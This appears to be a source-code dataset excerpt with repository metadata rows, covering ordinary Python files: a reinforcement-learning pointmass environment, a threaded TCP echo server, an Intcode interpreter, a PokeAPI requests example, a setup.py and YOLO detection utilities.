self.num_features_nonzero = placeholders['num_features_nonzero']
with tf.variable_scope(self.name + '_vars'):
self.vars['weights'] = tf.get_variable('weights', shape=(input_dim, output_dim),
dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(),
regularizer=tf.contrib.layers.l2_regularizer(FLAGS.weight_decay))
if self.bias:
self.vars['bias'] = zeros([output_dim], name='bias')
if self.logging:
self._log_vars()
def _call(self, inputs):
x = inputs
x = tf.nn.dropout(x, 1-self.dropout)
# transform
output = tf.matmul(x, self.vars['weights'])
# bias
if self.bias:
output += self.vars['bias']
return self.act(output)
| [
"ytongdou@gmail.com"
] | ytongdou@gmail.com |
ee9bcfc4389fcb2fb90096118f98f545a41ba488 | bb4c4cccf8bcd620aae1a8de4361caa1d749eec5 | /setup.py | 85704e4597c1f88108fd6bd00dd7f91afb15f886 | [
"MIT"
] | permissive | qxlsz/astromath | d9bac05067fdeaaf7e3bf768ef3bcb7fb7a2a547 | 5ad10de294c44818dde8e865d076fb6eda8f07b2 | refs/heads/master | 2023-08-22T19:06:36.944268 | 2020-06-25T15:32:57 | 2020-06-25T15:32:57 | 252,310,053 | 1 | 0 | MIT | 2023-09-14T12:31:39 | 2020-04-01T23:35:07 | Python | UTF-8 | Python | false | false | 1,515 | py | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = [ ]
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest>=3', ]
setup(
author="Rajasekhar Josyula",
author_email='rajasekhar.josyula@gmail.com',
python_requires='>=3.5',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
description="Library for mathematical astronomy",
entry_points={
'console_scripts': [
'astromath=astromath.cli:main',
],
},
install_requires=requirements,
license="MIT license",
long_description=readme + '\n\n' + history,
include_package_data=True,
keywords='astromath',
name='astromath',
packages=find_packages(include=['astromath', 'astromath.*']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/qxlsz/astromath',
version='1.0.1',
zip_safe=False,
)
| [
"rajasekhar.josyula@gmail.com"
] | rajasekhar.josyula@gmail.com |
94d03e9f0f7b8cec3c47cc368593566e2ada6fad | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_magnesia.py | 9193757fb3463cb627d30a16deadeb1b54c32ebb | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py |
#calss header
class _MAGNESIA():
def __init__(self,):
self.name = "MAGNESIA"
self.definitions = [u'a white substance used in stomach medicines']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
e4c1794ad74b66d0d7327370b2bf5ff25c80650b | 7db9f6b8a1966b08e5bafb7fef8fb3844b3f1471 | /multiworld/envs/mujoco/pointmass/pointmass.py | 03b6dfc5649846e4e95ed395077cdadd24ede7ef | [] | no_license | newera-001/RIS | a4dd82563e9f5521b6367a7463a2ab94c5203047 | 9cee42bf28924d4220b143dabf3655a6da260350 | refs/heads/main | 2023-06-19T09:31:48.215405 | 2021-07-16T12:28:01 | 2021-07-16T12:28:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,616 | py | import abc
import copy
import numpy as np
from gym.spaces import Box, Dict
from multiworld.core.serializable import Serializable
from multiworld.envs.mujoco.mujoco_env import MujocoEnv
from multiworld.core.multitask_env import MultitaskEnv
from multiworld.envs.env_util import get_asset_full_path
from collections import OrderedDict
from multiworld.envs.env_util import (
get_stat_in_paths,
create_stats_ordered_dict,
)
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
class PointmassEnv(MujocoEnv, Serializable, MultitaskEnv):
def __init__(
self,
reward_type='dense',
norm_order=2,
action_scale=0.15,
frame_skip=100,
ball_low=(-4.0, -4.0),
ball_high=(4.0, 4.0),
goal_low=(-4.0, -4.0),
goal_high=(4.0, 4.0),
model_path='pointmass_u_wall_big.xml',
reset_low=None,
reset_high=None,
v_func_heatmap_bounds=(-2.0, 0.0),
*args,
**kwargs
):
self.quick_init(locals())
MultitaskEnv.__init__(self)
MujocoEnv.__init__(self,
model_path=get_asset_full_path('pointmass/' + model_path),
frame_skip=frame_skip,
**kwargs)
self.action_space = Box(np.array([-1, -1]), np.array([1, 1]), dtype=np.float32)
self.action_scale = action_scale
self.ball_radius = 0.50
self.walls = [
Wall(0, 1.0, 2.5, 0.5, self.ball_radius),
Wall(2.0, -0.5, 0.5, 2.0, self.ball_radius),
Wall(-2.0, -0.5, 0.5, 2.0, self.ball_radius),
]
self.reward_type = reward_type
self.norm_order = norm_order
self.ball_low, self.ball_high = np.array(ball_low), np.array(ball_high)
self.goal_low, self.goal_high = np.array(goal_low), np.array(goal_high)
if reset_low is None:
self.reset_low = np.array(ball_low)
else:
self.reset_low = np.array(reset_low)
if reset_high is None:
self.reset_high = np.array(ball_high)
else:
self.reset_high = np.array(reset_high)
obs_space_low = np.copy(self.ball_low)
obs_space_high = np.copy(self.ball_high)
goal_space_low = np.copy(self.goal_low)
goal_space_high = np.copy(self.goal_high)
self.obs_space = Box(obs_space_low, obs_space_high, dtype=np.float32)
self.goal_space = Box(goal_space_low, goal_space_high, dtype=np.float32)
self.observation_space = Dict([
('observation', self.obs_space),
('desired_goal', self.goal_space),
('achieved_goal', self.obs_space),
('state_observation', self.obs_space),
('state_desired_goal', self.goal_space),
('state_achieved_goal', self.obs_space),
('proprio_observation', self.obs_space),
('proprio_desired_goal', self.goal_space),
('proprio_achieved_goal', self.obs_space),
])
self.v_func_heatmap_bounds = v_func_heatmap_bounds
self._state_goal = None
self.reset()
def step(self, velocities):
velocities = np.clip(velocities, a_min=-1, a_max=1) * self.action_scale
ob = self._get_obs()
action = velocities
self.do_simulation(action, self.frame_skip)
state, goal = ob['state_observation'], ob['state_desired_goal']
distance_to_target = np.linalg.norm(state - goal)
is_success = distance_to_target < 1.0
is_success_2 = distance_to_target < 1.5
is_success_3 = distance_to_target < 1.75
ob = self._get_obs()
reward = self.compute_reward(action, ob)
info = {
'distance_to_target': distance_to_target,
'is_success': is_success,
'is_success_2': is_success_2,
'is_success_3': is_success_3,
'velocity': velocities,
'speed': np.linalg.norm(velocities),
}
done = False
return ob, reward, done, info
def _get_obs(self):
qpos = list(self.sim.data.qpos.flat)
flat_obs = np.array(qpos)
self._cur_obs = dict(
observation=flat_obs,
desired_goal=self._state_goal,
achieved_goal=flat_obs,
state_observation=flat_obs,
state_desired_goal=self._state_goal,
state_achieved_goal=flat_obs,
proprio_observation=flat_obs,
proprio_desired_goal=self._state_goal,
proprio_achieved_goal=flat_obs,
)
return self._cur_obs
def get_goal(self):
return {
'desired_goal': self._state_goal.copy(),
'state_desired_goal': self._state_goal.copy(),
}
def sample_goals(self, batch_size):
goals = np.random.uniform(
self.goal_space.low,
self.goal_space.high,
size=(batch_size, self.goal_space.low.size),
)
collisions = self._positions_inside_wall(goals[:,:2])
collision_idxs = np.where(collisions)[0]
while len(collision_idxs) > 0:
goals[collision_idxs,:2] = np.random.uniform(
self.goal_space.low[:2],
self.goal_space.high[:2],
size=(len(collision_idxs), 2)
)
collisions = self._positions_inside_wall(goals[:, :2])
collision_idxs = np.where(collisions)[0]
return {
'desired_goal': goals,
'state_desired_goal': goals,
}
def _positions_inside_wall(self, positions):
inside_wall = False
for wall in self.walls:
inside_wall = inside_wall | wall.contains_points(positions)
return inside_wall
def _position_inside_wall(self, pos):
for wall in self.walls:
if wall.contains_point(pos):
return True
return False
def compute_rewards(self, actions, obs, prev_obs=None):
achieved_goals = obs['state_achieved_goal']
desired_goals = obs['state_desired_goal']
diff = achieved_goals - desired_goals
if self.reward_type == 'vectorized_dense':
r = -np.abs(diff)
elif self.reward_type == 'dense':
r = -np.linalg.norm(diff, ord=self.norm_order, axis=1)
else:
raise NotImplementedError("Invalid/no reward type.")
return r
def reset_model(self):
self._reset_ball()
self.set_goal(self.sample_goal())
self.sim.forward()
return self._get_obs()
def _reset_ball(self):
qvel = np.zeros(2)
pos_2d = np.random.uniform(self.reset_low, self.reset_high)
while self._position_inside_wall(pos_2d):
pos_2d = np.random.uniform(self.reset_low, self.reset_high)
qpos = pos_2d
self.set_state(qpos, qvel)
def set_goal(self, goal):
self._state_goal = goal['state_desired_goal']
def set_to_goal(self, goal):
qpos = goal['state_desired_goal']
qvel = np.zeros(2)
self.set_state(qpos, qvel)
def get_env_state(self):
joint_state = self.sim.get_state()
state = joint_state, self._state_goal
return copy.deepcopy(state)
def set_env_state(self, state):
state, goal = state
self.sim.set_state(state)
self.sim.forward()
self._state_goal = goal
def get_diagnostics(self, paths, prefix=''):
statistics = OrderedDict()
list_of_stat_names = [
'distance_to_target',
'is_success',
'is_success_2',
'is_success_3',
'velocity',
'speed',
]
for stat_name in list_of_stat_names:
stat_name = stat_name
stat = get_stat_in_paths(paths, 'env_infos', stat_name)
statistics.update(create_stats_ordered_dict(
'%s%s' % (prefix, stat_name),
stat,
always_show_all_stats=True,
))
statistics.update(create_stats_ordered_dict(
'Final %s%s' % (prefix, stat_name),
[s[-1] for s in stat],
always_show_all_stats=True,
))
return statistics
def viewer_setup(self):
# self.viewer.cam.trackbodyid = 0
# self.viewer.cam.lookat[0] = 0.0
# self.viewer.cam.lookat[1] = 0.0
# self.viewer.cam.lookat[2] = 0.5
# self.viewer.cam.distance = 12.5
# self.viewer.cam.elevation = -90
# self.viewer.cam.azimuth = 270
self.viewer.cam.trackbodyid = 0
self.viewer.cam.lookat[0] = 0.0
self.viewer.cam.lookat[1] = 0.75
self.viewer.cam.lookat[2] = 0.5
self.viewer.cam.distance = 11.5
self.viewer.cam.elevation = -65
self.viewer.cam.azimuth = 270
def get_states_sweep(self, nx, ny):
x = np.linspace(-4, 4, nx)
y = np.linspace(-4, 4, ny)
xv, yv = np.meshgrid(x, y)
states = np.stack((xv, yv), axis=2).reshape((-1, 2))
return states
def get_image_v(self, agent, qf, vf, obs, tau=None):
nx, ny = (50, 50)
x = np.linspace(-4, 4, nx)
y = np.linspace(-4, 4, ny)
xv, yv = np.meshgrid(x, y)
sweep_obs = np.tile(obs.reshape((1, -1)), (nx * ny, 1))
sweep_goal = np.stack((xv, yv), axis=2).reshape((-1, 2))
if tau is not None:
sweep_tau = np.tile(tau, (nx * ny, 1))
if vf is not None:
if tau is not None:
v_vals = vf.eval_np(sweep_obs, sweep_goal, sweep_tau)
else:
sweep_obs_goal = np.hstack((sweep_obs, sweep_goal))
v_vals = vf.eval_np(sweep_obs_goal)
else:
if tau is not None:
sweep_actions = agent.eval_np(sweep_obs, sweep_goal, sweep_tau)
v_vals = qf.eval_np(sweep_obs, sweep_actions, sweep_goal, sweep_tau)
else:
sweep_obs_goal = np.hstack((sweep_obs, sweep_goal))
sweep_actions = agent.eval_np(sweep_obs_goal)
v_vals = qf.eval_np(sweep_obs_goal, sweep_actions)
if tau is not None:
v_vals = -np.linalg.norm(v_vals, ord=qf.norm_order, axis=1)
v_vals = v_vals.reshape((nx, ny))
if self.v_func_heatmap_bounds is not None:
vmin = self.v_func_heatmap_bounds[0]
vmax = self.v_func_heatmap_bounds[1]
else:
vmin, vmax = None, None
return self.get_image_plt(
v_vals,
vmin=vmin, vmax=vmax,
draw_state=True, draw_goal=True,
)
def get_image_plt(
self,
vals,
vmin=None, vmax=None,
extent=[-4, 4, -4, 4],
small_markers=False,
draw_walls=True, draw_state=True, draw_goal=False, draw_subgoals=False,
imsize=84
):
fig, ax = plt.subplots()
ax.set_ylim(extent[2:4])
# ax.set_xlim(extent[0:2])
ax.set_xlim([4, -4])
ax.set_ylim(ax.get_ylim()[::-1])
DPI = fig.get_dpi()
fig.set_size_inches(imsize / float(DPI), imsize / float(DPI))
marker_factor = 0.60
if small_markers:
marker_factor = 0.10
ob = self._get_obs()
if draw_state:
if small_markers:
color = 'cyan'
else:
color = 'blue'
ball = plt.Circle(ob['state_observation'], self.ball_radius * marker_factor, color=color)
ax.add_artist(ball)
if draw_goal:
goal = plt.Circle(ob['state_desired_goal'], self.ball_radius * marker_factor, color='green')
ax.add_artist(goal)
if draw_subgoals:
if self.subgoals is not None:
subgoal = plt.Circle(self.subgoals[0], (self.ball_radius + 0.1) * marker_factor, color='red')
else:
subgoal = None
ax.add_artist(subgoal)
if draw_walls:
for wall in self.walls:
# ax.vlines(x=wall.min_x, ymin=wall.min_y, ymax=wall.max_y)
# ax.hlines(y=wall.min_y, xmin=wall.min_x, xmax=wall.max_x)
# ax.vlines(x=wall.max_x, ymin=wall.min_y, ymax=wall.max_y)
# ax.hlines(y=wall.max_y, xmin=wall.min_x, xmax=wall.max_x)
ax.vlines(x=wall.endpoint1[0], ymin=wall.endpoint2[1], ymax=wall.endpoint1[1])
ax.hlines(y=wall.endpoint2[1], xmin=wall.endpoint3[0], xmax=wall.endpoint2[0])
ax.vlines(x=wall.endpoint3[0], ymin=wall.endpoint3[1], ymax=wall.endpoint4[1])
ax.hlines(y=wall.endpoint4[1], xmin=wall.endpoint4[0], xmax=wall.endpoint1[0])
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
fig.subplots_adjust(bottom=0)
fig.subplots_adjust(top=1)
fig.subplots_adjust(right=1)
fig.subplots_adjust(left=0)
ax.axis('off')
ax.imshow(
vals,
extent=extent,
cmap=plt.get_cmap('plasma'),
interpolation='nearest',
vmax=vmax,
vmin=vmin,
origin='bottom', # <-- Important! By default top left is (0, 0)
)
return self.plt_to_numpy(fig)
def plt_to_numpy(self, fig):
fig.canvas.draw()
data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))
plt.close()
return data
class Wall(object, metaclass=abc.ABCMeta):
def __init__(self, x_center, y_center, x_thickness, y_thickness, min_dist):
self.min_x = x_center - x_thickness - min_dist
self.max_x = x_center + x_thickness + min_dist
self.min_y = y_center - y_thickness - min_dist
self.max_y = y_center + y_thickness + min_dist
self.endpoint1 = (x_center+x_thickness, y_center+y_thickness)
self.endpoint2 = (x_center+x_thickness, y_center-y_thickness)
self.endpoint3 = (x_center-x_thickness, y_center-y_thickness)
self.endpoint4 = (x_center-x_thickness, y_center+y_thickness)
def contains_point(self, point):
return (self.min_x < point[0] < self.max_x) and (self.min_y < point[1] < self.max_y)
def contains_points(self, points):
return (self.min_x < points[:,0]) * (points[:,0] < self.max_x) \
* (self.min_y < points[:,1]) * (points[:,1] < self.max_y) | [
"elliot.chane-sane@polytechnique.edu"
] | elliot.chane-sane@polytechnique.edu |
12d5b08f43173bbade7172ef7a8a5e8bb3df40d1 | 765929f8e17a39e680592fe461e36b4a296878f2 | /sklearn_tests/ml4.py | 009e190c710fa9a3525789f29548d01b0c4b99bb | [] | no_license | TontonTremblay/Machine_Learning | ec2b4f0429601cb17e7db0579350eee0809608bd | 9e273c9cc373a0919d10ba2a610ec76675ef2a47 | refs/heads/master | 2016-08-12T11:01:08.664217 | 2015-11-14T00:22:34 | 2015-11-14T00:22:34 | 44,108,762 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | import numpy as np
from sklearn import cross_validation, datasets, linear_model
from sklearn.grid_search import GridSearchCV
diabetes = datasets.load_diabetes()
X = diabetes.data[:150]
y = diabetes.target[:150]
lasso = linear_model.Lasso()
alphas = np.logspace(-4, -.5, 30)
clf = GridSearchCV(estimator = lasso,param_grid=dict(alpha=alphas),n_jobs=1)
clf.fit(X,y)
print clf.best_score_
print clf.best_estimator_.alpha | [
"tonton.tremblay@gmail.com"
] | tonton.tremblay@gmail.com |
96f571b5a83d21e3d3709c4e9197979323ce8dff | 9aaf600dfe71b217e6e218c8033dd79821a8d9c0 | /ch0/15requests and API/2pokeapi.py | b1cab7b3af6dcc9deb5610ea80844bad66c48d91 | [] | no_license | bonfiglio/introPython | 153d4467fbccab33a47a9c1157120ccb035efb9a | a2dae50d4f6efcc02217f8b4597f221164aa9ae5 | refs/heads/master | 2020-03-23T00:21:32.790040 | 2018-10-07T09:32:57 | 2018-10-07T09:32:57 | 139,994,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | import requests
import json
# https://tutorialedge.net/python/python-http-requests-tutorial/
def main():
req = requests.get('http://pokeapi.co/api/v2/pokemon/1/')
print("HTTP Status Code: " + str(req.status_code))
print(req.headers)
json_response = json.loads(req.content)
print(json_response)
print("Pokemon Name: " + json_response['name'])
print(f"{json_response['abilities']}")
if __name__ == '__main__':
main()
| [
"bonfiglio.fabrizio@gmail.com"
] | bonfiglio.fabrizio@gmail.com |
97a06c5441ff70691bbb29a70ec1cc78d5d5b2d8 | 7eb6071c56bde2e628e131237182ec2f6c620156 | /day7/intcode.py | 9751bc41e49e92c0c30bec596efd6b5b55d6a5a7 | [] | no_license | sambres/Aoc2019 | 98f42d9c7828b3a2fc23abeb9e858310c344c587 | f8543cb351a27ad4d9e43125ea8d0bcb6c64c7a3 | refs/heads/master | 2021-10-25T05:27:58.309414 | 2021-10-11T11:19:38 | 2021-10-11T11:19:38 | 231,900,398 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,295 | py |
def intCode(program, input):
result = None
i = 0
while True:
# print('op', program[i])
op = int(program[i][-2:])
if op == 99:
return result
if op == 1 or op == 2 or op == 7 or op == 8:
parametersLength = 3
if op == 3 or op == 4:
parametersLength = 1
if op == 5 or op == 6:
parametersLength = 2
modes = program[i][:-2].zfill(parametersLength)
parameters = []
for index, mode in enumerate(modes[::-1]):
parameter = int(program[i + index + 1])
if mode == '0':
# position
parameters.append(parameter)
else:
# immediate
parameters.append(i + index + 1)
if op == 1:
program[parameters[2]] = str(
int(program[parameters[0]]) + int(program[parameters[1]]))
if op == 2:
program[parameters[2]] = str(
int(program[parameters[0]]) * int(program[parameters[1]]))
if op == 3:
program[parameters[0]] = str(input.pop(0))
if op == 4:
result = program[parameters[0]]
# print('newinput', parameters[0], program[parameters[0]])
if op == 5 and program[parameters[0]] != '0':
# print('5', parameters, program[parameters[1]])
i = int(program[parameters[1]])
continue
if op == 6 and program[parameters[0]] == '0':
# print('6', parameters)
i = int(program[parameters[1]])
continue
if op == 7:
if program[parameters[0]] < program[parameters[1]]:
program[parameters[2]] = '1'
else:
program[parameters[2]] = '0'
if op == 8:
if program[parameters[0]] == program[parameters[1]]:
program[parameters[2]] = '1'
else:
program[parameters[2]] = '0'
i += parametersLength + 1
def intCodeAdvance(program, input, step=0):
result = []
i = step
while True:
# print('op', program[i])
op = int(program[i][-2:])
if op == 99:
return (result, True)
if op == 1 or op == 2 or op == 7 or op == 8:
parametersLength = 3
if op == 3 or op == 4:
parametersLength = 1
if op == 5 or op == 6:
parametersLength = 2
modes = program[i][:-2].zfill(parametersLength)
parameters = []
for index, mode in enumerate(modes[::-1]):
parameter = int(program[i + index + 1])
if mode == '0':
# position
parameters.append(parameter)
else:
# immediate
parameters.append(i + index + 1)
# print(i + ' - op', program[i], parameters)
if op == 1:
program[parameters[2]] = str(
int(program[parameters[0]]) + int(program[parameters[1]]))
if op == 2:
program[parameters[2]] = str(
int(program[parameters[0]]) * int(program[parameters[1]]))
if op == 3:
if len(input) == 0:
return (result, False, i)
program[parameters[0]] = str(input.pop(0))
if op == 4:
result.append(program[parameters[0]])
# print('output', program[parameters[0]])
if op == 5 and program[parameters[0]] != '0':
# print('5', parameters)
i = int(program[parameters[1]])
continue
if op == 6 and program[parameters[0]] == '0':
# print('6', parameters)
i = int(program[parameters[1]])
continue
if op == 7:
if program[parameters[0]] < program[parameters[1]]:
program[parameters[2]] = '1'
else:
program[parameters[2]] = '0'
if op == 8:
if program[parameters[0]] == program[parameters[1]]:
program[parameters[2]] = '1'
else:
program[parameters[2]] = '0'
i += parametersLength + 1
| [
"a.sambres@gmail.com"
] | a.sambres@gmail.com |
d317b649da9dc9553e5fa5daa23ef2d3ef162554 | 218eb56cf26d5f22d1fc9e7a1dd9a138ee5cd75b | /python_stuff/tcp_thread_server.py | 3375349f729ebf739965ea5f6a575a6eb04f4a1c | [] | no_license | breadpitt/SystemsProgramming | 6be7cf23e1e0a6b27d6c5b824c9e0fe60799d0f2 | 3fd71725842b52f0c45372e5922d0a98e8297ec1 | refs/heads/master | 2020-03-28T00:07:53.858131 | 2018-08-17T02:43:59 | 2018-08-17T02:43:59 | 147,377,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,998 | py | #!/opt/local/bin/python3.7
import sys
from socket import socket, SOCK_STREAM, AF_INET
from select import select
import traceback
from threading import Thread
class TCPClient(Thread):
def __init__(self, client_sock, client_address):
# Call parent (thread) constructor
super(TCPClient, self).__init__()
self.client_sock = client_sock
self.client_address = client_address
self.keep_running = True
self.read_fds = [self.client_sock]
def run(self):
while self.keep_running == True:
try:
readlist, _, _ = select(self.read_fds, [], [])
if self.client_sock in readlist:
data = self.client_sock.recv(4096)
self.client_sock.send(data)
if len(data) == 0:
self.client_sock.close()
except Exception:
self.keep_running = False
print("Shutting down client socket.")
self.client_sock.close()
def stop(self):
self.keep_running = False
def print_error(e, f="UNKNOWN"):
print("Error in %s!" % (f))
print(e)
print(type(e))
traceback.print_exc()
def main():
if len(sys.argv) == 3:
ip = sys.argv[1]
try:
port = int(sys.argv[2])
except:
print("Port %s unable to be converted to number, run with HOST PORT" % (sys.argv[2]))
sys.exit(1)
else:
print("Run with %s HOST PORT" % (sys.argv[0]))
sys.exit(1)
try:
server_sock = socket(AF_INET, SOCK_STREAM)
except Exception as e:
print_error(e, "socket")
sys.exit(1)
try:
server_sock.bind((ip, port))
except Exception as e:
print_error(e, "bind")
sys.exit(1)
try:
server_sock.listen(100)
except Exception as e:
print_error(e, "listen")
sys.exit(1)
read_sockets = []
write_sockets = []
except_sockets = []
client_threads = []
read_sockets.append(server_sock)
except_sockets.append(server_sock)
quit = False
readlist, writelist, exceptlist = [], [], []
while (quit == False):
try:
readlist, writelist, exceptlist = select(read_sockets, write_sockets, except_sockets, 3)
except KeyboardInterrupt as k:
quit = True
except Exception as e:
print_error(e, "select")
if server_sock in readlist:
try:
client_sock, (client_ip, client_port) = server_sock.accept()
temp_client_thread = TCPClient(client_sock, (client_ip, client_port))
client_threads.append(temp_client_thread)
temp_client_thread.start()
except KeyboardInterrupt as k:
quit = True
except Exception as e:
print_error(e, "accept")
for client_thread in client_threads:
if client_thread.keep_running == False:
print("Removing client thread.")
client_thread.join()
client_threads.remove(client_thread)
break;
try:
print("Closing sockets.")
server_sock.close()
for client_thread in client_threads:
client_thread.stop()
client_thread.join()
except:
pass
if __name__ == "__main__":
main()
| [
"jashannon10@gmail.com"
] | jashannon10@gmail.com |
043b864e84413e434016dad4ed24a7fbdfdc04b6 | fbada2dbf3d8963b9bf31accd1ec4a5f7e8f40c1 | /detection/models/detection/yolo/utils.py | db71c12addb9a78b7cb0b03d2dc1424377b12cc7 | [
"MIT"
] | permissive | stanford-policylab/surveilling-surveillance | fd7cabe2b526f5019e163961e0eef35c0ad29e45 | bbb9a147927a6342eecfe07ffa756b3acdb63f35 | refs/heads/master | 2023-06-17T14:32:22.923890 | 2021-07-15T16:10:41 | 2021-07-15T16:10:41 | 368,739,706 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,186 | py | """Define Logger class for logging information to stdout and disk."""
import collections
import os
import json
import torch
import numpy as np
import time
import torchvision
from os.path import join
def xywh2xyxy(x):
y = x.new(x.shape)
y[..., 0] = x[..., 0] - x[..., 2] / 2
y[..., 1] = x[..., 1] - x[..., 3] / 2
y[..., 2] = x[..., 0] + x[..., 2] / 2
y[..., 3] = x[..., 1] + x[..., 3] / 2
return y
def bbox_iou(box1, box2, x1y1x2y2=True):
"""
Returns the IoU of two bounding boxes
"""
if not x1y1x2y2:
# Transform from center and width to exact coordinates
b1_x1, b1_x2 = box1[:, 0] - box1[:, 2] / 2, box1[:, 0] + box1[:, 2] / 2
b1_y1, b1_y2 = box1[:, 1] - box1[:, 3] / 2, box1[:, 1] + box1[:, 3] / 2
b2_x1, b2_x2 = box2[:, 0] - box2[:, 2] / 2, box2[:, 0] + box2[:, 2] / 2
b2_y1, b2_y2 = box2[:, 1] - box2[:, 3] / 2, box2[:, 1] + box2[:, 3] / 2
else:
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = (box1[:, 0], box1[:, 1],
box1[:, 2], box1[:, 3])
b2_x1, b2_y1, b2_x2, b2_y2 = (box2[:, 0], box2[:, 1],
box2[:, 2], box2[:, 3])
# get the corrdinates of the intersection rectangle
inter_rect_x1 = torch.max(b1_x1, b2_x1)
inter_rect_y1 = torch.max(b1_y1, b2_y1)
inter_rect_x2 = torch.min(b1_x2, b2_x2)
inter_rect_y2 = torch.min(b1_y2, b2_y2)
# Intersection area
inter_area = (torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) *
torch.clamp(inter_rect_y2 - inter_rect_y1 + 1, min=0))
# Union Area
b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1)
b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1)
iou = inter_area / (b1_area + b2_area - inter_area + 1e-16)
return iou
def bbox_wh_iou(wh1, wh2):
wh2 = wh2.t()
w1, h1 = wh1[0], wh1[1]
w2, h2 = wh2[0], wh2[1]
inter_area = torch.min(w1, w2) * torch.min(h1, h2)
union_area = (w1 * h1 + 1e-16) + w2 * h2 - inter_area
return inter_area / union_area
def build_targets(pred_boxes, target, anchors, ignore_thres):
ByteTensor = torch.cuda.ByteTensor if pred_boxes.is_cuda\
else torch.ByteTensor
FloatTensor = torch.cuda.FloatTensor if pred_boxes.is_cuda\
else torch.FloatTensor
nB = pred_boxes.size(0)
nA = pred_boxes.size(1)
nG = pred_boxes.size(2)
# Output tensors
obj_mask = ByteTensor(nB, nA, nG, nG).fill_(0)
noobj_mask = ByteTensor(nB, nA, nG, nG).fill_(1)
iou_scores = FloatTensor(nB, nA, nG, nG).fill_(0)
tx = FloatTensor(nB, nA, nG, nG).fill_(0)
ty = FloatTensor(nB, nA, nG, nG).fill_(0)
tw = FloatTensor(nB, nA, nG, nG).fill_(0)
th = FloatTensor(nB, nA, nG, nG).fill_(0)
# Convert to position relative to box
target_boxes = target[:, 2:6] * nG
gxy = target_boxes[:, :2]
gwh = target_boxes[:, 2:]
# Get anchors with best iou
ious = torch.stack([bbox_wh_iou(anchor, gwh) for anchor in anchors])
best_ious, best_n = ious.max(0)
# Separate target values
b, target_labels = target[:, :2].long().t()
gx, gy = gxy.t()
gw, gh = gwh.t()
gi, gj = gxy.long().t()
# Set masks
obj_mask[b, best_n, gj, gi] = 1
noobj_mask[b, best_n, gj, gi] = 0
# Set noobj mask to zero where iou exceeds ignore threshold
for i, anchor_ious in enumerate(ious.t()):
noobj_mask[b[i], anchor_ious > ignore_thres, gj[i], gi[i]] = 0
# Coordinates
tx[b, best_n, gj, gi] = gx - gx.floor()
ty[b, best_n, gj, gi] = gy - gy.floor()
# Width and height
tw[b, best_n, gj, gi] = torch.log(gw / anchors[best_n][:, 0] + 1e-16)
th[b, best_n, gj, gi] = torch.log(gh / anchors[best_n][:, 1] + 1e-16)
iou_scores[b, best_n, gj, gi] = bbox_iou(
pred_boxes[b, best_n, gj, gi], target_boxes, x1y1x2y2=False)
tconf = obj_mask.float()
return (iou_scores, obj_mask, noobj_mask,
tx, ty, tw, th, tconf)
def slice_boundary(t, width):
"""Assumes shape (B, C, W, H, ...)."""
if not isinstance(width, int):
raise ValueError(f"ignore_width must be an integer. Got {width}.")
if width < 0:
raise ValueError(f"ignore_width must be positive. Got {width}.")
if width > t.shape[2] // 2:
raise ValueError("ignore_width * 2 must be less than image dim. " +
f"Got {width}.")
if width != 0:
return t[:, :, width:-width, width:-width].contiguous()
else:
return t
def parse_model_config(path, num_classes=80):
"""Parses the yolo-v3 layer configuration file and returns module definitions"""
file = open(path, 'r')
lines = file.read().split('\n')
lines = [x for x in lines if x and not x.startswith('#')]
lines = [x.rstrip().lstrip()
for x in lines] # get rid of fringe whitespaces
module_defs = []
for line in lines:
if line.startswith('['): # This marks the start of a new block
module_defs.append({})
module_defs[-1]['type'] = line[1:-1].rstrip()
if module_defs[-1]['type'] == 'convolutional':
module_defs[-1]['batch_normalize'] = 0
else:
key, value = line.split("=")
value = value.strip()
module_defs[-1][key.rstrip()] = value.strip()
# Overwrite number of classes
yolo_layers = []
for i, module_def in enumerate(module_defs):
if module_def['type'] == 'yolo':
yolo_layers.append(i)
module_defs[i]['classes'] = str(num_classes)
for i in yolo_layers:
module_defs[i - 1]['filters'] = str((num_classes + 5) * 3)
return module_defs
def parse_data_config(path):
"""Parses the data configuration file"""
options = dict()
options['gpus'] = '0,1,2,3'
options['num_workers'] = '10'
with open(path, 'r') as fp:
lines = fp.readlines()
for line in lines:
line = line.strip()
if line == '' or line.startswith('#'):
continue
key, value = line.split('=')
options[key.strip()] = value.strip()
return options
def to_cpu(tensor):
return tensor.detach().cpu()
def xy_to_cxcy(xy, height, width):
return [(xy[0] + xy[2]) / 2 / width,
